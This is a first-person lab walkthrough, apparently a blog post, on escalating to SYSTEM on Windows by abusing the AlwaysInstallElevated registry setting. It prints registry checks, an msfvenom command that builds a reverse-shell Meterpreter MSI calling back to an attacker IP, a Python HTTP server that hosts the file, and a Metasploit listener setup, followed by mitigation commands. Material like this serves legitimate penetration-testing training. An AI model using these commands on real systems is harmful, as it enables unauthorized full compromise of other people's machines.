1 minute read

🧠 Summary

In this walkthrough, I exploited the AlwaysInstallElevated privilege escalation technique on a vulnerable Windows machine. When both HKLM and HKCU registry keys for AlwaysInstallElevated are set to 1, any .msi file executed by a standard user will run with SYSTEM-level privileges. Below is a step-by-step breakdown of how I leveraged this misconfiguration to gain SYSTEM access.


🔍 Step 1: Confirming Registry Vulnerability

After gaining initial access to the target machine, I checked the registry for AlwaysInstallElevated values:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated Registry Settings
Registry keys confirming AlwaysInstallElevated is enabled

Both were set to 0x1, confirming the system is vulnerable.


💣 Step 2: Creating a Malicious MSI Payload

On my Kali attack box, I generated a reverse Meterpreter payload in MSI format using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.2.119.123 -f msi -o setup.msi
Generating malicious MSI payload
MSFVenom command to generate the setup.msi payload

🌐 Step 3: Hosting the Payload

I used Python to host the .msi file over HTTP:

python3 -m http.server 80
Payload served over HTTP
HTTP server log showing the victim downloading setup.msi

📥 Step 4: Downloading and Executing on Victim Machine

On the victim machine, I opened Internet Explorer and navigated to the Kali host IP to download the payload.

Browsing to download the payload
Setup.msi file download prompt
Payload download via Internet Explorer

🧠 Step 5: Listener Setup and Shell Access

On my Kali box, I launched a Metasploit listener to catch the reverse shell:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.2.119.123
run
Meterpreter SYSTEM shell
Confirmed SYSTEM-level Meterpreter shell from payload execution

The payload executed with SYSTEM privileges, as confirmed by the getuid command.


🛡️ Mitigation

To prevent this type of privilege escalation:

  • Set AlwaysInstallElevated to 0 in both HKLM and HKCU:
    reg add HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f
    reg add HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f
    
  • Restrict user ability to run .msi installers
  • Use endpoint monitoring to alert on privilege escalations

🔗 MITRE ATT&CK Mapping

  • T1548.002 – Abuse Elevation Control Mechanism: Bypass User Access Control

Success: I escalated from user to SYSTEM by abusing AlwaysInstallElevated and a malicious MSI payload. Always validate registry settings during post-exploitation recon!

Stay sharp, and happy hacking! 🛠️